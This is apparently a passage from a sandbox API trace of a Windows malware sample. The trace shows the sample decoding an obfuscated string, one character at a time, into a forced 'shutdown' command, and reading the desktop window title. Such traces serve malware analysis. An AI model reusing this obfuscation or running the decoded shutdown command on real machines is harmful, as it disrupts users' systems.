varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0178.867] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0178.867] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.868] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 0 [0178.868] GetTickCount () returned 0x1d1974e [0178.868] GetTickCount () returned 0x1d1974e [0178.868] GetTickCount () returned 0x1d1974e [0178.868] GetTickCount () returned 0x1d1974e [0178.868] IsWindowVisible (hWnd=0x103b8) returned 0 [0178.869] Sleep (dwMilliseconds=0x0) [0178.922] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0178.922] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0178.924] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0178.924] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0178.924] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0178.924] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.925] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 1 [0178.925] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28f54c) returned 0x0 [0178.925] IsWindow (hWnd=0x103bc) returned 1 [0178.925] GetWindowLongA (hWnd=0x103bc, nIndex=-16) returned 1140916224 [0178.925] IsIconic (hWnd=0x103b8) returned 0 [0178.926] GetParent (hWnd=0x103bc) returned 0x103b8 [0178.926] TranslateMessage (lpMsg=0x28f5e8) returned 0 [0178.926] DispatchMessageA (lpMsg=0x28f5e8) returned 0x0 [0178.926] KillTimer (hWnd=0x103bc, uIDEvent=0x103bc) returned 1 [0178.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.927] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.927] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.928] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0178.928] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.929] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0178.929] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.929] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.930] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.930] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0178.931] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.931] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0178.931] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.937] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.937] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.938] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.938] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.939] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.939] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.940] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.940] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.941] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0178.941] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.941] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.942] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.942] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.943] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.943] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0178.943] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.944] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.944] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.945] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.945] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.946] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.946] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.947] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.947] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.952] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.953] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.953] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.953] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.954] GetForegroundWindow () returned 0x20086 [0178.954] GetLastError () returned 0x0 [0178.954] SysStringLen (param_1=" ") returned 0xff [0178.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0178.954] SysStringLen (param_1=" ") returned 0xff [0178.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0178.954] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0178.955] GetLastError () returned 0x0 [0178.955] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0178.955] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0178.955] SysStringLen (param_1="Pr") returned 0x2 [0178.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pr", cchWideChar=3, lpMultiByteStr=0x116859c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pr", lpUsedDefaultChar=0x0) returned 3 [0178.956] SetWindowTextA (hWnd=0x103c4, lpString="Pr") returned 1 [0178.956] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0178.956] GetFocus () returned 0x0 [0178.956] lstrlenA (lpString="Pr") returned 2 [0178.956] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0178.956] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=3 | out: lpString="Fo") returned 2 [0178.956] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0178.956] GetFocus () returned 0x0 [0178.957] lstrcmpA (lpString1="Fo", lpString2="Pr") returned -1 [0178.957] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0178.957] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0178.957] IsWindow (hWnd=0x103c4) returned 1 [0178.957] IsWindow (hWnd=0x103c4) returned 1 [0178.958] IsWindow (hWnd=0x103c4) returned 1 [0178.958] IsWindow (hWnd=0x103c4) returned 1 [0178.958] GetFocus () returned 0x0 [0178.958] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0178.958] GetFocus () returned 0x0 [0178.959] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0178.959] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0178.959] GetFocus () returned 0x0 [0178.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0178.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=3 | out: lpWideCharStr="Pr") returned 3 [0178.959] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0178.959] VarBstrCmp (bstrLeft="Pr", bstrRight="S ", lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.960] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0178.961] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.961] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0178.961] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.962] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.962] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 